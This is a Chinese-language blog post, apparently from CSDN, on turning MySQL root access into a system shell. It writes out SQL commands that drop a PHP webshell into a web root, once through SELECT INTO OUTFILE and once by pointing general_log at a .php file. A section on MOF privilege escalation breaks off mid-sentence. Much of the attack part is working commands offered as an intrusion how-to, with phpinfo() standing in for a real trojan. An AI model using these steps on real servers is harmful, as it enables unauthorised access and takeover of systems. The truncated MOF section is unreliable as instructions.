mysql root拿shell_mysql的几种获取shell和提权的方式

本文介绍了多种通过MySQL获取系统shell和提权的方法,包括使用outfile导出webshell,利用mysql日志,MOF文件,以及UDF提权。详细阐述了各种方法的条件、步骤和注意事项,如secure_file_priv配置的限制与修改。
摘要由CSDN通过智能技术生成

♥喜欢请点个赞吧♥

mysql outfile导出webshell

条件:知道物理路径,root权限,同时mysql需要有write权限,secure_file_priv配置不为null,查看方法:show global variables like '%secure_file_priv%';

这个参数只能通过修改配置文件后重启mysql修改。

1.select '<?php phpinfo();?>' into outfile 'C:phpStudy/PHPTutorial/WWW/11.php'

2.新建一个表,创建一个空字段,在这个字段里插入php马,再导出

直接导出需要开启安全配置

secure_file_priv参数用于限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()(读取文件)

mysql日志获取webshell

查看:SHOW VARIABLES LIKE '%general%'

修改状态:set global general_log="ON";

修改储存位置:set global general_log_file='C:/phpStudy/PHPTutorial/WWW/11.php';

写马:select '<?php phpinfo(); ?>';

只需root权限即可

mof提权

MOF提权的条件要求十分严苛:

windows 03及以下版本

mysql启动身份具有权限去读写c:/windows/sy

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值